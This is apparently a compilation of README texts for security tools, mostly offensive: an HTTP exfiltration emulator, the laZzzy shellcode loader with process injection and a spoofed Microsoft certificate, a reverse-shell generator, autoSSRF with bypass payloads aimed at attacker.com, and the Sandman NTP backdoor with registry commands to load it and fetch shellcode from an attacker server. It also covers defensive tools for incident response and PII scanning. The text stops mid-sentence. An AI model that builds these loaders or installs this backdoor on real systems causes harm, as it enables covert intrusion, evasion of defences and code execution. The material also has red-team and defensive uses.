A project created to emulate and test exfiltration of data over different network protocols. The emulation is performed without using native APIs. This helps blue teams write correlation rules to detect C2 communication or data exfiltration.
Currently, this project can generate HTTP/HTTPS traffic (both GET and POST) using the below-mentioned programming/scripting languages:
Download the latest ZIP from the releases page.
With SSL: python3 HTTP-S-EXFIL.py ssl
Without SSL: python3 HTTP-S-EXFIL.py
CNet.exe <Server-IP-ADDRESS>
- Select any option
ChashNet.exe <Server-IP-ADDRESS>
- Select any option
.\PowerHttp.ps1 -ip <Server-IP-ADDRESS> -port <80/443> -method <GET/POST>
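To illustrate the kind of traffic these emulators generate, here is a minimal, hypothetical Python sketch of base64-encoded exfiltration over plain HTTP POST and chunked GET. It is not taken from the project; the /upload path and the c/d parameter names are assumptions for illustration only.

```python
import base64
import urllib.parse
import urllib.request

def exfil_post(server, data):
    """POST the data base64-encoded in a form body over plain HTTP."""
    body = urllib.parse.urlencode({"d": base64.b64encode(data).decode()}).encode()
    req = urllib.request.Request(f"http://{server}/upload", data=body, method="POST")
    with urllib.request.urlopen(req) as resp:
        return resp.read()

def exfil_get_chunks(server, data, chunk=64):
    """Split base64-encoded data into GET query strings (URLs have length limits).
    Returns the URLs instead of sending them, so the traffic shape is visible."""
    encoded = base64.b64encode(data).decode()
    return [f"http://{server}/?c={i}&d={urllib.parse.quote(encoded[i:i + chunk])}"
            for i in range(0, len(encoded), chunk)]
```

Traffic like this (base64 blobs in bodies or query strings, sequential offset counters) is exactly what a correlation rule could key on.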
laZzzy is a shellcode loader that demonstrates different execution techniques commonly employed by malware. laZzzy was developed using different open-source header-only libraries.
Native (Nt*) functions (not all functions, but most)
Windows machine with Visual Studio and the following components, which can be installed from Visual Studio Installer > Individual Components:
- C++ Clang Compiler for Windows and C++ Clang-cl for build tools
- ClickOnce Publishing
Python3 and the required modules:
python3 -m pip install -r requirements.txt
(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -h
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀⣼⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀
⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⣿⣯ ⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀by: CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀
usage: builder.py [-h] -s -p -m [-tp] [-sp] [-pp] [-b] [-d]
options:
-h, --help show this help message and exit
-s path to raw shellcode
-p password
-m shellcode execution method (e.g. 1)
-tp process to inject (e.g. svchost.exe)
-sp process to spawn (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)
-pp parent process to spoof (e.g. explorer.exe)
-b binary to spoof metadata (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)
-d domain to spoof (e.g. www.microsoft.com)
shellcode execution method:
1 Early-bird APC Queue (requires sacrificial process)
2 Thread Hijacking (requires sacrificial process)
3 KernelCallbackTable (requires sacrificial process that has GUI)
4 Section View Mapping
5 Thread Suspension
6 LineDDA Callback
7 EnumSystemGeoID Callback
8 FLS Callback
9 SetTimer
10 Clipboard
Execute builder.py and supply the necessary data.
(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -s .\calc.bin -p CaptMeelo -m 1 -pp explorer.exe -sp C:\\Windows\\System32\\notepad.exe -d www.microsoft.com -b C:\\Windows\\System32\\mmc.exe
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀ ⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⣿⣯⠀⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀by: CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀
[+] XOR-encrypting payload with
[*] Key: d3b666606468293dfa21ce2ff25e86f6
[+] AES-encrypting payload with
[*] IV: f96312f17a1a9919c74b633c5f861fe5
[*] Key: 6c9656ed1bc50e1d5d4033479e742b4b8b2a9b2fc81fc081fc649e3fb4424fec
[+] Modifying template using
[*] Technique: Early-bird APC Queue
[*] Process to inject: None
[*] Process to spawn: C:\\Windows\\System32\\RuntimeBroker.exe
[*] Parent process to spoof: svchost.exe
[+] Spoofing metadata
[*] Binary: C:\\Windows\\System32\\RuntimeBroker.exe
[*] CompanyName: Microsoft Corporation
[*] FileDescription: Runtime Broker
[*] FileVersion: 10.0.22621.608 (WinBuild.160101.0800)
[*] InternalName: RuntimeBroker.exe
[*] LegalCopyright: © Microsoft Corporation. All rights reserved.
[*] OriginalFilename: RuntimeBroker.exe
[*] ProductName: Microsoft® Windows® Operating System
[*] ProductVersion: 10.0.22621.608
[+] Compiling project
[*] Compiled executable: C:\MalDev\laZzzy\loader\x64\Release\laZzzy.exe
[+] Signing binary with spoofed cert
[*] Domain: www.microsoft.com
[*] Version: 2
[*] Serial: 33:00:59:f8:b6:da:86:89:70:6f:fa:1b:d9:00:00:00:59:f8:b6
[*] Subject: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/CN=www.microsoft.com
[*] Issuer: /C=US/O=Microsoft Corporation/CN=Microsoft Azure TLS Issuing CA 06
[*] Not Before: October 04 2022
[*] Not After: September 29 2023
[*] PFX file: C:\MalDev\laZzzy\output\www.microsoft.com.pfx
[+] All done!
[*] Output file: C:\MalDev\laZzzy\output\RuntimeBroker.exe
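The builder output above shows a randomly generated 16-byte XOR key plus an AES IV and a 256-bit AES key. A minimal Python sketch of the XOR layer follows; laZzzy's actual implementation may differ, and the AES layer (the 16-byte IV and 32-byte key suggest AES-256) would be applied on top with a crypto library such as pycryptodome.

```python
import os

def xor_crypt(data, key):
    """XOR data with a repeating multi-byte key; applying it twice restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# Randomly generated key material, matching the sizes shown in the builder output
xor_key = os.urandom(16)   # printed as 32 hex characters
aes_iv = os.urandom(16)    # AES block-sized IV
aes_key = os.urandom(32)   # AES-256 key length

payload = b"\x90\x90\xcc"  # placeholder shellcode
encrypted = xor_crypt(payload, xor_key)
assert xor_crypt(encrypted, xor_key) == payload  # XOR is its own inverse
```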
A framework for gathering OSINT on GitHub users, repositories, and organizations.
Refer to the Wiki for installation instructions, in addition to all other documentation.
Octosuite automatically logs network and user activity for each session; the logs are saved by date and time in the .logs folder.
This application aims to accelerate incident response by collecting information on Linux operating systems.
The following information is collected:
/etc/passwd
cat /etc/group
cat /etc/sudoers
lastlog
cat /var/log/auth.log
uptime
cat /proc/meminfo
ps aux
/etc/resolv.conf
/etc/hosts
iptables -L -v -n
find / -type f -size +512k -exec ls -lh {} \;
find / -mtime -1 -ls
ip a
netstat -nap
arp -a
echo $PATH
git clone https://github.com/anil-yelken/pylirt
cd pylirt
sudo pip3 install paramiko
The following information should be specified in the cred_list.txt file:
IP|Username|Password
sudo python3 pylirt.py
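The collection flow described above can be sketched with paramiko roughly as follows. This is a hypothetical approximation, not pylirt's actual code; the command subset and function names are illustrative, while the IP|Username|Password format comes from the README.

```python
COMMANDS = ["cat /etc/passwd", "lastlog", "ps aux", "ip a"]  # subset of the commands listed above

def load_credentials(path="cred_list.txt"):
    """Parse the IP|Username|Password lines described above.
    maxsplit=2 keeps passwords that themselves contain '|' intact."""
    with open(path) as f:
        return [line.strip().split("|", 2) for line in f if line.strip()]

def collect(host, user, password):
    """Run each collection command over SSH and return {command: output}."""
    import paramiko  # imported lazily so credential parsing works without paramiko installed
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(host, username=user, password=password, timeout=10)
    results = {}
    for cmd in COMMANDS:
        _, stdout, _ = client.exec_command(cmd)
        results[cmd] = stdout.read().decode(errors="replace")
    client.close()
    return results
```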
https://twitter.com/anilyelken06
https://medium.com/@anilyelken
A script for generating common revshells quickly and easily.
Especially nice when in need of PowerShell and Python revshells, which can be a PITA to get correctly formatted.
curl -F path="absolute path for Updog-folder" -F file=filename http://UpdogIP/upload
git clone https://github.com/4ndr34z/shells
cd shells
./install.sh
Octopii is an open-source AI-powered Personal Identifiable Information (PII) scanner that can look for image assets such as Government IDs, passports, photos and signatures in a directory.
Octopii uses Tesseract's Optical Character Recognition (OCR) and Keras' Convolutional Neural Networks (CNN) models to detect various forms of personal identifiable information that may be leaked on a publicly facing location. This is done in the following steps:
The image is imported via OpenCV and Python Imaging Library (PIL) and is cleaned, deskewed and rotated for scanning.
A directory is looped over and searched for images. These images are scanned for unique features via the image classifier (done by comparing it to a trained model), along with OCR for finding substrings within the image. This may have one of the following outcomes:
Best case (score >=90): The image is sent into the image classifier algorithm to be scanned for features such as an ISO/IEC 7810 card specification, colors, location of text, photos, holograms etc. If it is successfully classified as a type of PII, OCR is performed on it looking for particular words and strings as a final check. When both of these are confirmed, the result from Octopii is extremely reliable.
Average case (score >=50): The image is partially/incorrectly identified by the image classifier algorithm, but an OCR check finds contradicting substrings and reclassifies it.
Worst case (score >=0): The image is only identified by the image classifier algorithm but an OCR scan returns no results.
Incorrect classification: False positives due to a very small model or OCR list may incorrectly classify PIIs, giving inaccurate results.
As a final verification method, images are scanned for certain strings to verify the accuracy of the model.
The accuracy of the scan can be determined via the confidence scores in the output. If all the mentioned conditions are met, a score of 100.0 is returned.
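The final keyword-verification step can be sketched as follows. This is a simplified illustration, not Octopii's actual code; the real ocr_list.json schema also carries regexes, country information, and more.

```python
def ocr_keyword_score(ocr_text, ocr_list):
    """For each asset class, count how many of its keywords appear in the OCR text."""
    text = ocr_text.lower()
    return {cls: sum(kw.lower() in text for kw in entry["keywords"])
            for cls, entry in ocr_list.items()}

# Hypothetical ocr_list.json content; the real file holds more fields per class
ocr_list = {
    "German Passport": {"keywords": ["Reisepass", "Bundesrepublik Deutschland"]},
    "PAN Card": {"keywords": ["Income Tax Department", "Permanent Account Number"]},
}

scores = ocr_keyword_score("GOVERNMENT OF INDIA - Income Tax Department", ocr_list)
best_class = max(scores, key=scores.get)
```

A class whose keywords match the OCR text corroborates (or overrides) the image classifier's verdict, which is how the average-case reclassification above works.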
To train the model, data can also be fed into the model_generator.py script, and the newly improved h5 file can be used.
pip install -r requirements.txt
sudo apt install tesseract-ocr -y (for Ubuntu/Debian)
python3 octopii.py <location name>, for example python3 octopii.py pii_list/
python3 octopii.py <location to scan> <additional flags>
Octopii currently supports local scanning and scanning S3 directories and open directory listings via their URLs.
Open-source projects like these thrive on community support. Since Octopii relies heavily on machine learning and optical character recognition, contributions are much appreciated. Here's how to contribute:
Fork the official repository at https://github.com/redhuntlabs/octopii
There are 3 files in the models/ directory:
- The keras_models.h5 file is the Keras h5 model that can be obtained from Google's Teachable Machine or via Keras in Python.
- The labels.txt file contains the list of labels corresponding to the index that the model returns.
- The ocr_list.json file consists of keywords to search for during an OCR scan, as well as other miscellaneous information such as country of origin, regular expressions, etc.
Since our current dataset is quite small, we could benefit from a large Keras model of international PII for this project. If you do not have expertise in Keras, Google provides an extremely easy-to-use model generator called the Teachable Machine. To use it:
Tip: segregate your image assets into folders with the folder name being the same as the class name. You can then drag and drop a folder into the upload dialog.
Note: Only upload images that match the class name; for example, the German Passport class must contain only German Passport pictures. Uploading the wrong data to the wrong class will confuse the machine learning algorithms.
Export the model, then copy the keras_model.h5 file and the labels.txt file into the models/ directory in Octopii.
The images used for the model above are not visible to us since they're in a proprietary format. You can use both dummy and actual PII. Make sure they are square-ish in image size.
Once you generate models using Teachable Machine, you can improve Octopii's accuracy via OCR. To do this:
Open the ocr_list.json file and create a JSONObject with the key having the same name as the asset class. NOTE: The key name must be exactly the same as the asset class name from Teachable Machine.
For keywords, use as many unique terms from your asset as possible, such as "Income Tax Department". Store them in a JSONArray.
Save the ocr_list.json file.
You can replace each file you modify in the models/ directory after you create or edit them via the above methods.
Submit a pull request from your forked repo and we'll pick it up and replace our current model with it if the changes are large enough.
Note: Please take care to ensure the quality of your ocr_list.json changes.
(c) Copyright 2022 RedHunt Labs Private Limited
Author: Owais Shaikh
autoSSRF is your best ally for identifying SSRF vulnerabilities at scale. Unlike other SSRF automation tools, it comes with the following two original features:
Smart fuzzing on relevant SSRF GET parameters
When fuzzing, autoSSRF only focuses on the common parameters related to SSRF (?url=, ?uri=, ...) and doesn't interfere with everything else. This ensures that the original URL is still correctly understood by the tested web application, something that might not happen with a tool that blindly sprays query parameters.
Context-based dynamic payload generation
For the given URL https://host.com/?fileURL=https://authorizedhost.com, autoSSRF would recognize authorizedhost.com as a potentially whitelisted host for the web application and generate payloads dynamically based on that, attempting to bypass the whitelist validation. This results in interesting payloads such as http://authorizedhost.attacker.com, http://authorizedhost%252F@attacker.com, etc.
Furthermore, this tool produces almost no false positives. Detection relies on ProjectDiscovery's excellent interactsh, allowing autoSSRF to confidently identify out-of-band DNS/HTTP interactions.
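The context-based payload generation idea can be sketched roughly like this. This is not autoSSRF's actual implementation; the bypass shapes are taken from the examples above, and the function and parameter names are illustrative.

```python
from urllib.parse import urlparse, urlunparse, parse_qs, urlencode

def generate_payloads(url, param, collaborator):
    """Given a URL whose `param` points at a whitelisted host, build bypass
    candidates that keep the authorized host visible inside the value."""
    parts = urlparse(url)
    query = parse_qs(parts.query)
    authorized = urlparse(query[param][0]).netloc or query[param][0]
    candidates = [
        f"http://{authorized}.{collaborator}",       # attacker-controlled subdomain
        f"http://{authorized}%252F@{collaborator}",  # double-encoded slash + userinfo trick
        f"http://{collaborator}/?{authorized}",      # authorized host moved into the query
    ]
    payloads = []
    for candidate in candidates:
        query[param] = [candidate]
        payloads.append(urlunparse(parts._replace(query=urlencode(query, doseq=True))))
    return payloads
```

Each generated URL would then be requested, and any out-of-band DNS/HTTP hit on the collaborator domain confirms the SSRF.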
python3 autossrf.py -h
This displays help for the tool.
usage: autossrf.py [-h] [--file FILE] [--url URL] [--output] [--verbose]
options:
-h, --help show this help message and exit
--file FILE, -f FILE file of all URLs to be tested against SSRF
--url URL, -u URL url to be tested against SSRF
--output, -o output file path
--verbose, -v activate verbose mode
Single URL target:
python3 autossrf.py -u "https://www.host.com/?param1=X&param2=Y&param2=Z"
Multiple URLs target with verbose:
python3 autossrf.py -f urls.txt -v
1 - Clone
git clone https://github.com/Th0h0/autossrf.git
2 - Install requirements
Python libraries :
cd autossrf
pip install -r requirements.txt
Interactsh-Client :
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
autoSSRF is distributed under MIT License.
Sandman is a backdoor that is meant to work on hardened networks during red team engagements.
Sandman works as a stager and leverages NTP (the protocol used to sync time and date) to fetch and run arbitrary shellcode from a pre-defined server.
Because NTP is overlooked by many defenders, it is usually allowed even in hardened networks, which gives Sandman wide network accessibility.
Run on a Windows or *nix machine:
python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"
Network Adapter: The adapter that you want the server to listen on (for example Ethernet for Windows, eth0 for *nix).
Payload Url: The URL to your shellcode, it could be your agent (for example, CobaltStrike or meterpreter) or another stager.
IP to Spoof: If you want to spoof a legitimate IP address (for example, time.microsoft.com's IP address).
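For context, a well-formed NTP server response is only a 48-byte header, which is part of why the protocol makes such a quiet carrier. The sketch below builds a standard packet in Python; how Sandman actually encodes its magic header and payload is not specified here, so the trailing-bytes approach is purely illustrative.

```python
import struct
import time

NTP_EPOCH_OFFSET = 2208988800  # seconds between the NTP (1900) and Unix (1970) epochs

def build_ntp_response(extra=b""):
    """Build a minimal 48-byte NTP v3 server (mode 4) response; any extra
    bytes are simply appended after the standard header (illustrative only)."""
    li_vn_mode = (0 << 6) | (3 << 3) | 4  # LI=0, version 3, mode 4 (server)
    stratum, poll, precision = 2, 4, -20
    now = int(time.time()) + NTP_EPOCH_OFFSET
    header = struct.pack(
        "!BBbb11I",
        li_vn_mode, stratum, poll, precision,
        0, 0, 0,   # root delay, root dispersion, reference ID
        now, 0,    # reference timestamp (seconds, fraction)
        now, 0,    # originate timestamp
        now, 0,    # receive timestamp
        now, 0,    # transmit timestamp
    )
    return header + extra

packet = build_ntp_response()
assert len(packet) == 48 and packet[0] & 0x07 == 4  # valid-looking mode-4 reply
```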
To start, compile the SandmanBackdoor as mentioned below. Because it is a single lightweight C# executable, you can execute it via ExecuteAssembly, run it as an NTP provider, or just execute/inject it.
To use it, you will need to follow simple steps:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"
sc stop w32time
sc start w32time
NOTE: Make sure you are compiling with the x64 option and not any CPU option!
Getting and executing an arbitrary payload from an attacker's controlled server.
Can work on hardened networks since NTP is usually allowed in FW.
Impersonating a legitimate NTP server via IP spoofing.
Python 3.9
The requirements are specified in the requirements file.
To compile the backdoor I used Visual Studio 2022, but as mentioned in the usage section, it can be compiled with both VS2022 and CSC. You can compile it either with USE_SHELLCODE defined, to use Orca's shellcode, or without USE_SHELLCODE, to use WebClient.
To compile the time-provider DLL I also used Visual Studio 2022; you will additionally need to install DllExport (via NuGet or any other way). Again, you can compile either with USE_SHELLCODE, to use Orca's shellcode, or without it, to use WebClient.
A shellcode is injected into RuntimeBroker.
Suspicious NTP communication starts with a known magic header.
YARA rule.
Orca for the shellcode.
Special thanks to Tim McGuffin for the time provider idea.
Thanks to those who have already contributed! I'll happily accept contributions; make a pull request and I will review it.
This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:
The python script is based on the link finding capabilities of my Burp extension GAP. As a starting point, I took the amazing tool LinkFinder by Gerben Javado, and used the Regex for finding links, but with additional improvements to find even more.
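To give a feel for the approach, here is a much-simplified link-extraction sketch. This is not xnLinkFinder's or LinkFinder's actual regex, which is far more thorough; it only illustrates the idea of pulling quoted URLs, paths, and interesting file references out of a response body.

```python
import re

# A simplified link-finding pattern in the spirit of LinkFinder/GAP:
# quoted strings that look like URLs, absolute paths, or interesting files.
LINK_RE = re.compile(
    r"""["'](
        https?://[^"'\s]+      # full URLs
        | //[^"'\s]+           # protocol-relative URLs
        | /[^"'\s]*            # absolute paths
        | [\w./-]+\.(?:js|php|asp|aspx|json|xml)(?:\?[^"'\s]*)?  # interesting file types
    )["']""",
    re.VERBOSE,
)

def extract_links(body):
    """Return de-duplicated links found in a response body, in order of appearance."""
    seen, links = set(), []
    for match in LINK_RE.finditer(body):
        link = match.group(1)
        if link not in seen:
            seen.add(link)
            links.append(link)
    return links
```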
xnLinkFinder supports Python 3.
$ git clone https://github.com/xnl-h4ck3r/xnLinkFinder.git
$ cd xnLinkFinder
$ sudo python setup.py install
Arg | Long Arg | Description |
---|---|---|
-i | --input | Input a: URL, text file of URLs, a Directory of files to search, a Burp XML output file or an OWASP ZAP output file. |
-o | --output | The file to save the Links output to, including path if necessary (default: output.txt). If set to cli then output is only written to STDOUT. If the file already exists it will just be appended to (and de-duplicated) unless option -ow is passed. |
-op | --output-params | The file to save the Potential Parameters output to, including path if necessary (default: parameters.txt). If set to cli then output is only written to STDOUT (but not piped to another program). If the file already exists it will just be appended to (and de-duplicated) unless option -ow is passed. |
-ow | --output-overwrite | If the output file already exists, it will be overwritten instead of being appended to. |
-sp | --scope-prefix | Any links found starting with / will be prefixed with scope domains in the output instead of the original link. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used. |
-spo | --scope-prefix-original | If argument -sp is passed, then this determines whether the original link starting with / is also included in the output (default: false) |
-sf | --scope-filter | Will filter output links to only include them if the domain of the link is in the scope specified. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used. |
-c | --cookies † | Add cookies to pass with HTTP requests. Pass in the format 'name1=value1; name2=value2;'
|
-H | --headers † | Add custom headers to pass with HTTP requests. Pass in the format 'Header1: value1; Header2: value2;'
|
-ra | --regex-after | RegEx for filtering purposes against found endpoints before output (e.g. /api/v[0-9]\.[0-9]\* ). If it matches, the link is output. |
-d | --depth † | The level of depth to search. For example, if a value of 2 is passed, then all links initially found will then be searched for more links (default: 1). This option is ignored for Burp files because they can be huge and consume lots of memory. It is also advisable to use the -sp (--scope-prefix ) argument to ensure a request to links found without a domain can be attempted. |
-p | --processes † | Basic multithreading is done when getting requests for a URL, or file of URLs (not a Burp file). This argument determines the number of processes (threads) used (default: 25) |
-x | --exclude | Additional Link exclusions (to the list in config.yml ) in a comma separated list, e.g. careers,forum
|
-orig | --origin | Whether you want the origin of the link to be in the output. Displayed as LINK-URL [ORIGIN-URL] in the output (default: false) |
-t | --timeout † | How many seconds to wait for the server to send data before giving up (default: 10 seconds) |
-inc | --include | Include input (-i ) links in the output (default: false) |
-u | --user-agent † | What User Agents to get links for, e.g. -u desktop mobile
|
-insecure | † | Whether TLS certificate checks should be disabled when making requests (default: false) |
-s429 | † | Stop when > 95 percent of responses return 429 Too Many Requests (default: false) |
-s403 | † | Stop when > 95 percent of responses return 403 Forbidden (default: false) |
-sTO | † | Stop when > 95 percent of requests time out (default: false) |
-sCE | † | Stop when > 95 percent of requests have connection errors (default: false) |
-m | --memory-threshold | The memory threshold percentage. If the machine's memory goes above the threshold, the program will be stopped and ended gracefully before running out of memory (default: 95) |
-mfs | --max-file-size † | The maximum file size (in bytes) of a file to be checked if -i is a directory. If the file size is over, it will be ignored (default: 500 MB). Setting to 0 means no files will be ignored, regardless of size. |
-replay-proxy | † | For active link finding with URL (or file of URLs), replay the requests through this proxy. |
-ascii-only | | Whether links and parameters will only be added if they contain only ASCII characters. This can be useful when you know the target is likely to use ASCII characters and you also get a number of false positives from binary files for some reason. |
-v | --verbose | Verbose output |
-vv | --vverbose | Increased verbose output |
-h | --help | show the help message and exit |
† NOT RELEVANT FOR INPUT OF DIRECTORY, BURP XML FILE OR OWASP ZAP FILE
The config.yml file has keys which can be updated to suit your needs:
- linkExclude - A comma separated list of strings (e.g. .css,.jpg,.jpeg etc.) that all links are checked against. If a link includes any of the strings then it will be excluded from the output. If the input is a directory, then file names are checked against this list.
- contentExclude - A comma separated list of strings (e.g. text/css,image/jpeg,image/jpg etc.) that all responses' Content-Type headers are checked against. Any responses with these content types will be excluded and not checked for links.
- fileExtExclude - A comma separated list of strings (e.g. .zip,.gz,.tar etc.) that all files in Directory mode are checked against. If a file has one of those extensions it will not be searched for links.
- regexFiles - A list of file types separated by a pipe character (e.g. php|php3|php5 etc.). These are used in the Link Finding Regex when there are findings that aren't obvious links, but are interesting file types that you want to pick out. If you add to this list, ensure you escape any dots to ensure correct regex, e.g. js\.map
- respParamLinksFound † - Whether to get potential parameters from links found in responses: True or False
- respParamPathWords † - Whether to add path words in retrieved links as potential parameters: True or False
- respParamJSON † - If the MIME type of the response contains JSON, whether to add JSON Key values as potential parameters: True or False
- respParamJSVars † - Whether JavaScript variables set with var, let or const are added as potential parameters: True or False
- respParamXML † - If the MIME type of the response contains XML, whether to add XML attribute values as potential parameters: True or False
- respParamInputField † - If the MIME type of the response contains HTML, whether to add NAME and ID attributes of any INPUT fields as potential parameters: True or False
- respParamMetaName † - If the MIME type of the response contains HTML, whether to add NAME attributes of any META tags as potential parameters: True or False
† IF THESE ARE NOT FOUND IN THE CONFIG FILE THEY WILL DEFAULT TO True
python3 xnLinkFinder.py -i target.com
Ideally, provide a scope prefix (-sp) with the primary domain (including schema), and a scope filter (-sf) to filter the results to relevant domains only (each can be a file or in-scope domains). You can also pass cookies and custom headers to ensure you find links only available to authorised users. Specifying the User Agents (-u desktop mobile) will first search for all links using desktop User Agents, and then try again using mobile User Agents; there could be specific endpoints related to the User Agent given. Giving a depth value (-d) will keep sending requests to links found on the previous depth of search to find more links.
python3 xnLinkFinder.py -i target.com -sp target_prefix.txt -sf target_scope.txt -spo -inc -vv -H 'Authorization: Bearer XXXXXXXXXXXXXX' -c 'SessionId=MYSESSIONID' -u desktop mobile -d 10
If you have a file of JS file URLs for example, you can look for links in those:
python3 xnLinkFinder.py -i target_js.txt
If you have a directory of files, e.g. JS files, HTTP responses, etc., you can look for links in those:
python3 xnLinkFinder.py -i ~/Tools/waymore/results/target.com
NOTE: Sub directories are also checked. The -mfs
option can be specified to skip files over a certain size.
In Burp, select the items you want to search (by highlighting the scope, for example), right click and select Save selected items. Ensure that the base64-encode requests and responses option is checked before saving. To get all links from the file (even with HUGE files, you'll be able to get all the links):
python3 xnLinkFinder.py -i target_burp.xml
NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i
starts with <?xml
then you are trying to process a Burp file.
Ideally, provide scope prefix (-sp
) with the primary domain (including schema), and a scope filter (-sf
) to filter the results only to relevant domains.
python3 xnLinkFinder.py -i target_burp.xml -o target_burp.txt -sp https://www.target.com -sf target.* -ow -spo -inc -vv
In ZAP, select the items you want to search (by highlighting the History, for example), click menu Report and select Export Messages to File.... This will let you save an ASCII text file of all requests and responses you want to search. To get all links from the file (even with HUGE files, you'll be able to get all the links):
python3 xnLinkFinder.py -i target_zap.txt
NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i
is in the format ==== 99 ==========
for example, then you are trying to process an OWASP ZAP ASCII text file.
You can pipe xnLinkFinder to other tools. Any errors are sent to stderr
and any links found are sent to stdout
. The output file is still created in addition to the links being piped to the next program. However, potential parameters are not piped to the next program, but they are still written to file. For example:
python3 xnLinkFinder.py -i redbull.com -sp https://redbull.com -sf redbull.* -d 3 | unfurl keys | sort -u
You can also pass the input through stdin
instead of -i
.
cat redbull_subs.txt | python3 xnLinkFinder.py -sp https://redbull.com -sf redbull.* -d 3
NOTE: You can't pipe in a Burp or ZAP file, these must be passed using -i
.
Always provide the Scope Prefix argument -sp. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no path should be included, and no wildcards used; schema is optional, but will default to http):
